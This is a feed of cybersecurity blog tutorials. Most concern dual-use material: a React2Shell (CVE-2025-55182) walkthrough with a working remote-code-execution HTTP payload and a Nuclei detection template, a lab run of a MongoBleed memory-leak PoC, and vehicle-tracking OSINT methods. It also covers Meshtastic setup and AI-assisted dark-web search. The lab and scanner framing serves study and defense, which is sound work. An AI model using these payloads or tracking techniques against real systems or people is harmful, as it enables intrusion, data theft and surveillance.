Normal view

There are new articles available, click to refresh the page.
Before yesterdayMain stream

Off-Grid Communications, Part 2: Getting Started with Meshtastic on LILYGO T-Echo Device

22 January 2026 at 10:17

Welcome back, aspiring cyberwarriors!

Traditional methods of communication leave us vulnerable and reliant on systems controlled by companies and governments that have demonstrated they can’t be trusted with our data. Cell towers can be turned off, internet connections can be monitored, and messaging apps can be hacked or give your messages to the government without telling you. Meshtastic lets you build your own communication network that works completely on its own, without any central authority.

In this article, we will configure Meshtastic firmware on the Lilygo T-Echo device and connect it to the mesh network. Let’s get rolling!

What is Lilygo T-Echo?

Source: https://lilygo.cc

The Lilygo T-Echo is a small device that has a Nordic nRF52840 chip, a Semtech SX1262 LoRa radio, and an e-paper screen. This configuration makes it great for mesh networking when you need long battery life and long-range communication. The device can talk to other Meshtastic nodes from several kilometers away in cities and possibly tens of kilometers away in open areas, all while using very little power. You can find a list of devices compatible with Meshtastic after the link. The installation process will be similar to that of the Lilygo T-Echo. But different countries use diverse frequency ranges, so this should be taken into account when purchasing a device.

Step #1: Install the Meshtastic Firmware

Before your T-Echo or any other Meshtastic-compatible device can join a mesh network, you need to flash it with the Meshtastic firmware. The device ships with factory firmware that needs to be replaced with the Meshtastic software stack.

First, navigate to the official Meshtastic web flasher at flasher.meshtastic.org. You will see options for different device types and firmware versions.

Choose your device from the list and the firmware version. After that, connect your Lilygo T-Echo to your computer using a USB-C cable and click Flash.

You might need to trigger DFU mode. To do so, just click Button 1, as shown in the screenshot below.

Source: https://meshtastic.org/

First, download the UF2 file and copy it to the DFU drive. Once the transfer is complete, the device will automatically reboot and start with the new firmware.

Next, hold down button 2 to select your region and generate a random node name.

Step #2: Install the Meshtastic Mobile Application

To interact with your T-Echo from your smartphone, you need to install the official Meshtastic application. This app serves as your primary interface for sending messages, viewing the mesh network, and configuring your device settings.

On Android devices, open the Google Play Store or F-Droid and search for “Meshtastic.” The official application is published by Meshtastic LLC and should appear at the top of your search results.

The app requires several permissions, including Bluetooth access and location services, which are necessary for communicating with your T-Echo and displaying your position on the mesh if you choose to share location data.

Once the installation completes, open the Meshtastic app. You will be greeted with a welcome screen like the one below.

Step #3: Pair Your T-Echo with Your Smartphone

Now comes the important step of connecting your phone to your T-Echo device. This pairing process creates a secure Bluetooth link that lets your phone set up the device and send messages through it.

In the Meshtastic mobile app, look for a Scan button. The app will begin scanning for nearby Meshtastic devices that are broadcasting their availability over Bluetooth.

Tap on your T-Echo’s name in the device list to initiate the pairing process. The app will attempt to establish a connection with the device. During this process, the app may require you to enter a PIN code displayed on your T-Echo’s screen, though this security feature is not always enabled by default.

Once the pairing completes successfully, the app interface will change to show that you are connected to your device. You should see your node name at the top of the screen, along with battery level, signal strength, and other status information.

At this point, your phone can communicate with your T-Echo, but you are not yet part of a mesh network unless there are other Meshtastic nodes within radio range. The connection you have established is purely between your phone and your device over Bluetooth. The mesh networking happens over the LoRa radio, which operates independently of the Bluetooth connection.

Step #4 Customize Your Node Configuration

Open the Meshtastic app and go to the settings menu, indicated by a gear icon. In the settings, you will find several categories, including Device, Radio Configuration, Module Configuration, and more.

Start with the User settings. Here you can change your node’s name from the randomly generated default to something more meaningful. Tap on the Long Name field and enter a name that identifies you or your device. This name will be visible to other users on the mesh, so choose something appropriate. You can use up to 40 characters, though shorter names are generally better for display purposes. Below the long name, you will see a Short Name field limited to four characters.

In the Radio Configuration section, you will find settings that control how your T-Echo communicates over the LoRa radio. The most important setting here is the Region, which must be set correctly for your geographic location to comply with local radio regulations. For users in North America, select US. European users should select their specific country or the general EU_868 or EU_433 option depending on the frequency band they are using.

The Modem Preset determines the balance between range, speed, and reliability for your radio communications. The default setting is typically Long Fast, which provides a good compromise for most users. This preset utilizes a spreading factor of 11, which provides the best range while maintaining reasonable data rates for text messaging.

The Number of Hops setting controls how many times a message can be retransmitted through the mesh before it is dropped. The default value of 3 is suitable for most networks, enabling messages to travel through multiple nodes to reach distant recipients without generating excessive radio traffic. Besides that, you will find options for enabling various Meshtastic features, like MQTT, GPS, and Telemetry. We’ll explore these topics in future articles.

Important Note: By default, all nodes use a common encryption key, which means anyone with a Meshtastic device can read your messages. You can create private channels, but this goes out of the scope of this article.

Step #5: Send Your First Message

In the Meshtastic app, navigate to the Messages tab or screen. You will see a list of available channels. The LongFast channel is created by default and is where most mesh communication happens. Tap on this channel to open the message interface.

At the bottom of the screen, you will find a text input field where you can write your message. Please remember that Meshtastic is meant for short text messages, with a limit of 200 characters. Tap the send button to transmit your message.

Your T-Echo will receive the message from your phone over Bluetooth and then broadcast it over the LoRa radio. If there are other Meshtastic nodes within range, they will receive your message and display it to their users. If your message needs to reach a node that is not in direct radio range, intermediate nodes will automatically relay it through the mesh until it reaches its destination or the hop limit is exceeded.

You will see your message appear in the conversation thread with a timestamp. If other nodes are present on the mesh, you may see responses or other messages from those users. In my case, we can see somebody leave an emoji on my message. Besides that, T-Echo notifies you on its screen when you receive a new message, and you can switch to the Message tab by clicking Button 2.

Summary

In a world where our communications are constantly monitored, logged, and sold to the highest bidder, Meshtastic running on affordable hardware like the Lilygo T-Echo offers a way to communicate independently. This technology puts the power back in your hands, letting you create mesh networks that work completely outside the control of telecom companies and government surveillance. Whether you’re coordinating security in areas without cell coverage, preparing backup communications for when regular systems fail, or simply want to talk to your team without companies reading every word, Meshtastic gives you the tools you need.

Keep coming back, aspiring off-grid users! We’re diving deeper into this topic, so stay tuned for more updates.

Artificial Intelligence in Cybersecurity, Part 8: AI-Powered Dark Web Investigations

14 January 2026 at 09:03

Welcome back, aspiring cyberwarriors!

If you’ve ever conducted an OSINT investigation, you probably know that the dark web is one of the hardest places to investigate. Whether you’re tracking ransomware groups or looking for leaked passwords manually searching through dark web results takes hours and gives you mostly junk and malware. This is where AI can change how you investigate. By using Large Language Models we can improve our searches and filter results faster. To do this, we have a tool called Robin.

In this article, we’ll explore how to install this tool, how to use it, and what features it provides. Let’s get rolling!

What is Robin

Robin is an open-source tool for investigating the dark web. It uses AI to improve your searches, filter results from dark web search engines, and summarize what you find. What makes Robin particularly valuable is its multi-model support. You can easily switch between OpenAI, Claude, Gemini, or local models like Ollama depending on your needs, budget, and privacy requirements. The tool is CLI-first, built for terminal users who want to integrate dark web intelligence into their existing workflows.

Step #1: Install Robin

For this demonstration, I’ll be using a Raspberry Pi as the hacking platform, but you can easily replicate all the steps using Kali or any other Debian-based distribution. To install the tool, we can either use the source code from GitHub or Docker. I will choose the first option. To begin, clone the repository first:

pi> git clone https://github.com/apurvsinghgautam/robin.git

As shown in the downloaded files, this is a Python project. We need to create a virtual environment and install the required packages.

pi> python -m venv venv

pi> source venv/bin/activate

pi> pip3 install -r requirements.txt

Before Robin can search the dark web, we need to have Tor running on your system. Install Tor by opening your terminal and executing the following command:

pi> sudo apt install tor

Step #2: Configure Your API Key

In this demonstration, I will be using Google’s Gemini models. You can easily create an API key in Google AI Studio to access the models. If you open the config.py file, you will see which models support the tool.

Robin can be configured using either a .env file or system environment variables. For most users, creating a .env file in your Robin directory provides the cleanest approach. This method keeps your API credentials organized and makes it easy to switch between different configurations. Open the file in your preferred text editor and add your Gemini API key.

Step #3: Execute Your First Dark Web Investigation

First, let’s open the help screen to see which options this tool supports and to verify that we installed it correctly.

pi> python3 main.py –help

Currently, we can see two supported modes for using this tool: CLI and web UI. I prefer CLI, so I will demonstrate that. Let’s explore the help screen of the CLI mode.

pi> python3 main.py cli –help

It’s a straightforward help screen; we simply need to specify an LLM model and our query. Let’s search for credential exposure.

pi> python3 main.py cli -m gemini-2.5-flash -q “sensitive credentials exposure”

After a few minutes of processing, Robin produced the gathered information on the terminal. By default, it is formatted in Markdown and saved to a file with a name based on the current date and time. To view the results with Markdown formatting, I’ll use a command-line tool called glow.

pi> glow summary-xx-xx.md

The analysis examined various Tor-based marketplaces, vendors, and leak sources that advertise stolen databases and credentials. The findings reveal a widespread exposure of personally identifiable information (PII), protected health information (PHI), financial data, account credentials, and cryptocurrency private keys associated with major global organizations and millions of individuals. The report documents active threat actors, their tactics, and methods of monetization. Key risks have been identified, along with recommended next steps.

Understand the Limitations

While Robin is a powerful tool for dark web OSINT, it’s important to understand its limits. The tool uses dark web search engines, which only index a small part of what’s actually on hidden services. Many dark websites block indexing or require you to log in, so Robin can’t reach them through automated searches. For thorough investigations, you’ll still need to add manual research and other OSINT methods to what Robin finds.

The quality of Robin’s intelligence summaries depends a lot on the LLM you’re using and the quality of what it finds. Gemini 2.5 Flash gives great results for most investigations, but the AI can only work with the information in the search results. If your search doesn’t match indexed content, or if the information you need is behind a login wall, Robin won’t find it.

Summary

Conducting investigations on the dark web can be time-consuming when using traditional search tools. Since the dark web relies on anonymity networks, isn’t indexed by standard search engines, and contains a vast amount of irrelevant information, manual searching can often be slow and ineffective. Robin addresses these challenges by leveraging AI to enhance your searches, intelligently filter results, and transform findings into useful intelligence reports. While this tool does have limitations, it can be a valuable addition to your arsenal when combined with manual searching and other OSINT tools.

If you’re interested in deepening your knowledge of OSINT investigations or even starting your own investigation business, consider exploring our OSINT training to enhance your skills.

React2Shell Vulnerability Exploited to Build Massive IoT Botnet

8 January 2026 at 08:56

Welcome back, aspiring cyberwarriors!

In our industry, we often see serious security flaws that change everything overnight. React2Shell is one of those flaws. On December 3, 2025, security researchers found CVE-2025-55182, a critical bug with a perfect 10.0 severity score that affects React Server Components and Next.js applications. Within hours of going public, hackers started using this bug to break into IoT devices and web servers on a massive scale. By December 8, security teams saw widespread attacks targeting companies across multiple industries, from construction to entertainment.

What makes React2Shell so dangerous is how simple it is to use. Attackers only need to send one malicious HTTP request to take complete control of vulnerable systems. No complicated steps, no extra work required, just one carefully crafted message and the attacker owns the target.

In this article, we’ll explore the roots of React2Shell and how we can exploit this vulnerability in IoT devices.

The Technical Mechanics of React2Shell

React2Shell takes advantage of how React Server Components handle the React Flight protocol. The React Flight protocol is what moves server-side components of the web framework around. You can think of React Flight as the language that React Server Components use to communicate. When we talk about deserialization vulnerabilities like React2Shell, we’re talking about data that’s supposed to be formatted a certain way being misread by the code that receives it. To learn more about deserialization, check our previous article.

Internally, the deserialization payload takes advantage of how React handles Chunks, which are basic building blocks that define what React should render, display, or run. A chunk is basically a building block of a web page – a small piece of data that the server evaluates to render or process the page on the server instead of in the browser. Essentially, all these chunks are put together to build a complete web page with React.

In this vulnerability, the attacker crafts a Chunk that includes a then method. When React Flight sends this data to React Server Components, React treats the value as thenable, something that behaves like a Promise. Promises are essentially a way for code to say it does not have the result of something yet but will run some code and provide the results later. Javascript React’s automatic handling or misinterpretation of these promised values is what this exploit abuses.

Implementation of Chunk.prototype.then from the React source

Chunks are referenced with the dollar at token. The attacker has figured out a way to express state within the request forged to the server. With a status of resolved model, the attacker is tricking React Flight into thinking that it has already fulfilled the data in chunk zero. Essentially, the attacker has forged the lifecycle of the request to be further along than it actually is. Because this is resolved as thenable due to the then method by React Server Components, this leads down a code path which eventually executes malicious code.

When Chunk 1 is evaluated, React observes that this is thenable, meaning it appears as a promise. It will refer to Chunk 0 and then attempt to resolve the forged then method. Since the attacker now controls the then resolution path, React Server Components has been tricked into a codepath which the attacker has ultimate control over. When formData.get is set to a value which resolves to a constructor, React treats that field as a reference to a constructor function that it should hydrate during processing of the blob value. This becomes critical because dollar B values are rehydrated by React, and subsequently it must invoke the constructor.

This makes dollar B the execution pivot. By compelling React to hydrate a Blob-like value, React is forced to execute the constructor that the attacker smuggled into formData.get. Since that constructor resolves to the malicious thenable function, React executes the code as part of its hydration process. Lastly, by defining the prefix primitive, the attacker prepends malicious code into the executable codepath. By appending two forward slashes to the payload, the attacker has told Javascript to treat the rest as a commented block, allowing execution of only the attacker’s code and avoiding syntax errors, quite similar to SQL Injection.

Fire Up the PoC

Before working with the exploit, let’s go to Shodan and see how many active sites on Next.js it has indexed.

As you can see, the query: http.component:“Next.js” 200 country:“ru” returned more than a thousand results. But of course, not all of them are vulnerable. To check, we can use the following template for Nuclei.

id: cve-2025-55182-react2shell

info:
  name: Next.js/React Server Components RCE (React2Shell)
  author: assetnote
  severity: critical
  description: |
    Detects CVE-2025-55182 and CVE-2025-66478, a Remote Code Execution vulnerability in Next.js applications using React Server Components.
    It attempts to execute 'echo $((1337*10001))' on the server. If successful, the server returns a redirect to '/login?a=11111'.
  reference:
    - https://github.com/assetnote/react2shell-scanner
    - https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id:
      - CVE-2025-55182
      - CVE-2025-66478
  tags: cve, cve2025, nextjs, rce, react

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
        Next-Action: x
        X-Nextjs-Request-Id: b5dce965
        X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad

        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
        Content-Disposition: form-data; name="0"

        {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('echo $((1337*10001))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
        Content-Disposition: form-data; name="1"

        "$@0"
        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
        Content-Disposition: form-data; name="2"

        []
        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "/login?a=13371337"
          - "X-Action-Redirect"
        condition: and

Next, this command will show whether the web application is vulnerable.

kali> nuclei -silent -u http://<ip>:3000 -t react2shell.yaml

In addition, on Github you can find scanners in different programming languages that do exactly the same thing. Here is an example of a solution from Malayke:

You can create a test environment for this vulnerability with just a few commands:

kali> npx create-next-app@16.0.6 my-cve-2025-66478-app

kali> cd my-cve-2025-66478-app

kali> npm run dev

Commands above create a new Next.js application named my-cve-2025-66478-app using version 16.0.6 of the official setup tool, without installing anything globally. If you open localhost:3000 in your browser, you will see the following.

At this stage, we can proceed to exploit the vulnerability. Open your preferred web app proxy application, such as Burp Suite or ZAP. In this case, I will be using Caido (if you have not used it before, you can familiarize yourself with it in the following articles).

The algorithm is quite simple: we need to catch the request to the site and redirect it to Replay.

After that, we need to change the request from GET to POST and add a payload. The overall request looks like this:

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

As a result, the id command was executed.

Observed Attack Patterns

Security researchers have identified multiple instances of React2Shell attacks across different systems. The similar patterns observed in these cases reveal how the attacker operates and which tools they use, at least during the early days following the vulnerability’s disclosure.

In the first case, on December 4, 2025, the attacker broke into a vulnerable Next.js system running on Windows and tried to download an unknown file using curl and bash commands. They then tried to download a Linux cryptocurrency miner. About 6 hours later, they tried to download a Linux backdoor. The attackers also ran commands like whoami and echo, which researchers believe was a way to test if commands would run and figure out what operating system was being used.

In the second case, on another Windows computer, the attacker tried to download multiple files from their control servers. Interestingly, the attacker ran the command ver || id, which is a trick to figure out if the system is running Windows or Linux. The ver command shows the Windows version, while id shows user information on Linux. The double pipe operator makes sure the second command only runs if the first one fails, letting the attacker identify the operating system. Like before, the attacker also ran a command to test if their code would run, followed by commands like whoami and hostname to gather user and system information.

In the third case, the attacker followed the same pattern. They first ran commands to test if their code would work and used commands like whoami to gather user information. The attacker then tried to download multiple files from their control servers. The commands follow the same approach: download a shell script, run it with bash, and sometimes delete it to hide evidence.

Unlike the earlier Windows cases, the fourth case targeted a Linux computer running a Next.js application. The attacker successfully broke in and installed an XMRig cryptocurrency miner.

Based on the similar pattern seen across multiple computers, including identical tests and control servers, researchers believe the attacker is likely using automated hacking tools. This is supported by the attempts to use Linux-specific files on Windows computers, showing that the automation doesn’t tell the difference between operating systems. On one of the hacked computers, log analysis showed evidence of automated vulnerability scanning before the attack. The attacker used a publicly available GitHub tool to find vulnerable Next.js systems before launching their attack.

RondoDox Campaign

Security researchers have found a nine-month campaign targeting IoT devices and web applications to build a botnet called RondoDox. This campaign started in early 2025 and has grown through three phases, each one bigger and more advanced than the last.

The first phase ran from March through April 2025 and involved early testing and manual scanning for vulnerabilities. During this time, the attackers were testing their tools and looking for potential targets across the internet. The second phase, from April through June 2025, saw daily mass scanning targeting web applications like WordPress, Drupal, and Struts2, along with IoT devices such as Wavlink routers. The third phase, starting in July and continuing through early December 2025, marked a shift to hourly automated attacks on a large scale, showing the operators had improved their tools and were ready for mass attacks.

When React2Shell was disclosed in December 2025, the RondoDox operators immediately added it to their toolkit alongside other N-day vulnerabilities, including CVE-2023-1389 and CVE-2025-24893. The attacks detected in December follow a consistent pattern. Attackers scan to find vulnerable Next.js servers, then try to install multiple payloads on infected devices. These payloads include cryptocurrency miners, botnet loaders, health checkers, and Mirai botnet variants. The infection chain is designed to stay on systems and resist removal attempts.

A large portion of the attack traffic comes from a datacenter in Poland, with one IP address alone responsible for more than 12,000 React2Shell-related events, along with port scanning and attempts to exploit known Hikvision vulnerabilities. This behavior matches patterns seen in Mirai-derived botnets, where compromised infrastructure is used both for scanning and for launching multi-vector attacks. Additional scanning comes from the United States, the Netherlands, Ireland, France, Hong Kong, Singapore, China, Panama, and other regions, showing broad global participation in opportunistic attacks.

Mitigation

CVE-2025-55182 exists in several versions including version 19.0, 19.1.0, 19.1.1, and 19.2.0 of the following packages: react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Businesses relying on any of these impacted packages should update immediately.

Summary

Cyberwarriors need to make sure their systems are safe from new threats. The React2Shell vulnerability is a serious risk for organizations using React Server Components and Next.js applications. Hackers can exploit this vulnerability to steal personal data, corporate data, and attack critical infrastructure by installing malware. This vulnerability is easy to exploit, and many organizations use the affected software, which has made it popular with botnet operators who’ve quickly added React2Shell to their attack tools. Organizations need to patch right away, use multiple layers of defense, and watch their systems closely to protect against this threat. A vulnerability like React2Shell can take down entire networks if even one application is exposed.

Open Source Intelligence (OSINT): Tools and Techniques for Vehicle Investigation, Part 1

31 December 2025 at 12:45

Welcome back, aspiring cyberwarriors!

Today, vehicles are everywhere, and overlooking them during an OSINT investigation would be a serious mistake. Every car leaves behind a trail of digital and photographic evidence through its license plates, identification numbers, and physical presence in public spaces. Unlike traditional methods that rely on privileged access to government records, modern vehicle OSINT utilizes publicly available resources, community-sourced data, and open registries to construct detailed intelligence profiles.

In this article, we will look at four services that can help you jump-start your vehicle OSINT investigation. Let’s get rolling!

Understanding License Plate Intelligence

The first thing we’ll see during car OSINT is the license plate. Plates are one of the most recognizable vehicle identifiers worldwide, but their formats, designs, and information structures vary from one region to another. To determine which country a license plate belongs to, we can use the website worldlicenseplates.com.

This website serves as a visual reference, cataloging plate designs from nearly every country and region. For instance, let’s check Russian license plates.

On this site you can view different license plate types and how they evolved over time. It also displays government, police, military, and other unique plate styles for easier identification during OSINT work.

Aggregating Search Tools for Plate Research

There are many databases that allow you to gather information about vehicles by entering a plate number, but instead of searching multiple services across different jurisdictions, you can use a tool created by Cyber Detective called Vehicle Number Search Toolbox. It serves as a navigation hub that directs investigators to the most relevant lookup tools for each country.

By selecting a country and entering a license plate number, the website redirects you to the appropriate database for that jurisdiction. Below, for example, is a sample report for a vehicle registered in the United Kingdom.

In addition to plate lookup tools, it is worth mentioning a service called Nomerogram. This is a community driven platform where users upload and share photographs and sightings of license plates across Russia.

Unlike Western equivalents that focus primarily on vehicle specifications or collector interests, Nomerogram emphasizes geolocation and movement tracking. Users upload photographs of vehicles they encounter, tagging them with location and timestamp information, gradually building a distributed surveillance network that maps vehicle movements across vast geographic areas.

Crowdsourced Vehicle Photography and Tracking

Another useful platform for finding vehicle images by license plate is Platesmania. It functions as a global community of car enthusiasts who photograph and upload interesting or unique plates along with the vehicles they belong to. The site works much like a social network focused on automotive photography, where users contribute photos from daily observations and explore uploads from others.

The search functionality allows anyone to query specific plate numbers and retrieve all associated photographs uploaded to the platform. Each photograph includes the location where it was taken, the date and time, and typically shows the complete vehicle along with surrounding context.

Interestingly, government vehicles, diplomatic plates, and personalized or unique registrations often receive special attention from contributors, which can inadvertently result in detailed tracking datasets over time.

Summary

In this article we explored how to identify license plates by visual characteristics, access jurisdiction-specific databases, and utilize crowdsourced photography platforms to track vehicle movements across different regions.

To continue learning and sharpening your investigative abilities, be sure to explore our OSINT Investigator Bundle.

The post Open Source Intelligence (OSINT): Tools and Techniques for Vehicle Investigation, Part 1 first appeared on Hackers Arise.

Database Hacking: Get Started with MongoBleed Vulnerability

29 December 2025 at 10:20

Welcome back, my aspiring cyberwarriors!

Recently, MongoDB disclosed a critical security vulnerability that security researchers quickly dubbed “MongoBleed” in reference to its similarity to the infamous Heartbleed vulnerability that affected OpenSSL years earlier. Just as Heartbleed allowed attackers to extract memory from vulnerable web servers, MongoBleed enables unauthenticated attackers to leak sensitive data from MongoDB server memory without any credentials or authentication.

In this article, we will briefly discuss NoSQL databases, explore the origins of MongoBleed, and finally walk through the exploitation process in a lab environment. Let’s get rolling!

What are NoSQL Databases?

Before diving into the vulnerability itself, it is essential to have some understanding of databases in general and what MongoDB is.

Relational databases (RDBMS), such as MySQL, are very common, and at Hackers-Arise, you can find a set of articles covering how they might be hacked. However, when an application needs to handle large amounts of data with high speed and reliability, developers may need a different solution. This is where NoSQL databases come in.

NoSQL systems like MongoDB offer an alternative to traditional SQL databases. They are popular today because they are easy to use, scale well both horizontally and vertically, and provide flexible data storage. Unlike relational databases, NoSQL does not force data into fixed tables and rows. Instead, developers can store data in the format that best suits their needs.

NoSQL databases come in four main types, as shown on the image below.

Source: https://www.geeksforgeeks.org/

Among them, document databases are the most widely used. They store data in document format, making it easy to search and structure. In document databases, a “document” replaces a table row, and a “collection” replaces a table. MongoDB also a document database that stores data as flexible BSON (Binary JSON) documents.

Understanding the Vulnerability

MongoBleed takes advantage of a flaw in how MongoDB’s network layer processes compressed messages. To understand it fully, we need to look at how the MongoDB wire protocol works, how zlib compression fits into it, and where the vulnerability appears in that process.

MongoDB Wire Protocol Basics

MongoDB clients and servers communicate using a binary protocol that exchanges messages over TCP connections. Each message consists of a header containing metadata like message length and operation type, followed by the actual message body containing the command or response data. When compression is enabled, this body section gets compressed before transmission and must be decompressed by the receiver before processing.

The wire protocol header includes a field indicating the total message length, which the receiver uses to know how much data to read from the network socket. For compressed messages, there’s an additional header containing information about the compression algorithm used and the claimed uncompressed size of the data. This uncompressed size field is important to understanding the vulnerability, as it tells MongoDB how much memory to allocate for holding the decompressed data.

How Zlib Compression Works

Zlib is a widely-used compression library that implements the DEFLATE algorithm. Simplified DEFLATE algorithm is shown below.

When MongoDB enables zlib compression, outgoing messages get compressed before transmission and incoming compressed messages get decompressed upon receipt. The compression process reduces the network bandwidth required for communication, which can significantly improve performance when clients and servers communicate over limited or high-latency networks.

The decompression process requires allocating a buffer large enough to hold the uncompressed data. The compressed data includes information about how much space the uncompressed form will require, and MongoDB reads this value to allocate an appropriately sized buffer. The zlib decompression function then writes the decompressed data into this buffer, returning a value indicating how many bytes were actually written.

If you struggle to understand how compression works, consider checking our Cryptography Basics for Hackers training.

The Vulnerability Mechanism

An attacker crafts a malicious MongoDB wire protocol message that claims an unrealistically large uncompressed size. For example, they might send a message whose compressed payload is only 100 bytes but claims it will decompress to 50,000 bytes. MongoDB, trusting this claim, allocates a 50,000-byte buffer to hold the decompressed data.

The zlib library then decompresses the actual 100 bytes of compressed data, which expands to perhaps 500 bytes of uncompressed data. Zlib writes these 500 bytes to the beginning of the 50,000-byte buffer and returns a value indicating that it wrote 500 bytes. However, due to the bug in MongoDB’s implementation, the server doesn’t properly verify this return value against the claimed uncompressed size. Instead, it treats the entire 50,000-byte buffer as if it contains valid decompressed data.

When MongoDB then parses this buffer as BSON, the parser reads field names and values sequentially through the buffer. It successfully parses the first 500 bytes of legitimate decompressed data, but then continues reading into the remaining 49,500 bytes of uninitialized memory. In C and C++ programming, uninitialized memory contains whatever data happened to be there from previous operations rather than being zeroed out. This memory space might contain fragments of previous MongoDB operations, other clients’ queries, configuration data, or any other information that recently resided in that memory region.

The BSON parser continues reading through this uninitialized memory region, interpreting random bytes as field names until it encounters null bytes (0x00) which mark the end of field names in the BSON format. By carefully choosing different claimed uncompressed sizes in successive exploitation attempts, an attacker can probe different regions of memory, extracting varying chunks of data and slowly reconstructing complete sensitive information.

Affected Versions

The MongoBleed vulnerability affects a very broad range of MongoDB Server releases, covering almost a decade of versions. It impacts MongoDB 8.2.0 through 8.2.2, 8.0.0 through 8.0.16, 7.0.0 through 7.0.27, 6.0.0 through 6.0.26, 5.0.0 through 5.0.31, 4.4.0 through 4.4.29, as well as all releases in the 4.2.x, 4.0.x, and 3.6.x series. In simple terms, any deployment running a version released since mid-2017 may be at risk if it has not been updated.

The issue affects both Community and Enterprise editions and applies to environments running on-premises, in virtual machines, containers, or in the cloud. As long as the server has zlib compression enabled and is reachable over the network, it remains vulnerable.

MongoDB has issued fixes for all currently supported branches. Older versions such as 4.2, 4.0, and 3.6 no longer receive patches.

The Exploitation

To exploit the MongoBleed vulnerability, there are several proof-of-concept implementations available in different programming languages. One useful example is Joe Desimone’s PoC, which also includes a Docker Compose file that lets you quickly spin up a vulnerable MongoDB environment for testing.

To begin, clone the repository using the following command:

kali> git clone https://github.com/joe-desimone/mongobleed.git

By reviewing the mongobleed script, we can see how it generates malformed compressed BSON messages and attempts to capture memory bytes that the server unintentionally leaks.

To test the PoC, we’ll first set up a vulnerable MongoDB instance:

kali> docker-compose up -d

By checking the running Docker containers, we can see that mongobleed-target is active and listening on the default MongoDB port.

kali> sudo docker ps | grep mongo

Let’s run the exploit on it:

kali> python3 mongobleed.py –host localhost

This initial scan probed memory offsets from 20 to 8192. The exploit works by creating BSON documents with artificially large length fields. When MongoDB processes these documents, it reads field names from uninitialized memory until it encounters a null byte. Using different offsets gives access to different memory regions.

The leaked data can include internal MongoDB logs and state information, WiredTiger configuration details, system /proc data such as memory and network stats, file paths from inside the Docker container, and even connection UUIDs and client IP addresses.

To gather more information, we can run a deeper scan:

kali> python3 mongobleed.py –host localhost –max-offset 50000

According to Shodan, there are nearly 214,000 hosts running MongoDB.

However, it’s important to remember that many of these systems are already patched, and some do not use zlib compression at all, which makes MongoBleed ineffective against them.

Summary

MongoBleed is one of the most serious MongoDB vulnerabilities discovered in recent years, affecting almost ten years of server releases. Tracked as CVE-2025-14847, it carries a CVSS score between 7.5 and 8.7, depending on the scoring system. Its impact is severe because it requires no login, is easy to exploit over the network, and affects MongoDB versions from 3.6 up through 8.2.

In this article, we walked through the vulnerability, demonstrated how it can be exploited in a lab setup, and highlighted the potential attack surface it exposes.

The post Database Hacking: Get Started with MongoBleed Vulnerability first appeared on Hackers Arise.

Artificial Intelligence in Cybersecurity, Part 7: AI-Powered Vulnerability Scanning with BugTrace-AI

23 December 2025 at 10:43

Welcome back, aspiring cyberwarriors and AI enthusiasts!

AI is stepping up in every aspect of our cybersecurity job: STRIDE-GPT generates threat models and mitigations to them, BruteForceAI helps with password attacks, and LLM-Tools-Nmap conducts reconnaissance. Today is a time to explore AI-powered vulnerability scanning.

In this article, we’ll cover the BugTrace-AI toolkit from installation through advanced usage. We’ll begin with setup and configuration, then explore each of the core analysis tools, including URL analysis, code review, and security header evaluation. Let’s get rolling!

What Is BugTrace-AI?

BugTrace-AI leverages Generative AI to understand context, identify logic flaws, and provide intelligent recommendations that adapt to each unique situation. The tool performs non-invasive reconnaissance and analysis, generating hypotheses about potential vulnerabilities that serve as starting points for manual investigation.

The platform integrates both Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST) within a single interface. It supports multiple AI models through OpenRouter, including Google Gemini, Anthropic Claude, and many more.

It’s important to recognize that this tool functions as an assistant rather than an automated exploitation tool. Based on that, we should understand that all findings should be deliberately validated.

Step #1: Installation

First of all, we need to clone the repository from GitHub:

kali> git clone https://github.com/yz9yt/BugTrace-AI.git

kali> cd BugTrace-AI

After listing the content of the downloaded directory, we can see the script we need – dockerizer.sh. We need to add execution permissions and launch it.

kali> chmod +x dockerizer.sh

kali> sudo ./dockerizer.sh

